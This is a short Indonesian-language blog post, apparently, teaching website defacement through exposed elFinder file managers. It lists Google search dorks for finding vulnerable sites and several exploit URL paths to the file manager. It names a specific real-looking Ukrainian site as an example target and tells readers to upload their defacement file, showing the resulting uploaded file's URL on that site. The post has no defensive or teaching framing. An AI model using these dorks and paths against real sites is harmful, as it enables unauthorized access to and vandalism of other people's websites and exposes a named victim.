Ok Langsung saja :)
Ketikkan dork ini di kotak pencarian google untuk mencari target :
inurl:/elfinder/elfinder.php.html
inurl:/elfinder/files/
Exploit:
http://site.com/[path]/elfinder/elfinder.html
http://site.com/[path]/elfinder/elfinder.php.html
http://site.com/[path]/elfinder/src/elfinder-src.php.html
http://site.com/[path]/elfinder/elfinder.src.html
http://site.com/[path]/elfinder/elfinder.html.sav
Contoh target yang saya temukan adalah http://yamaha-zigfrid.com.ua/var/ckeditor/
Kemudian masukkan exploitnya menjadi :
http://yamaha-zigfrid.com.ua/var/ckeditor/elfinder/elfinder.html
Kemudian buka, dan upload file defacean mu :)
Hasilnya : http://yamaha-zigfrid.com.ua/var/upload/bona09.txt
Sumber : Catatan Kecil Bona
BalasHapusMUDAH TEKNO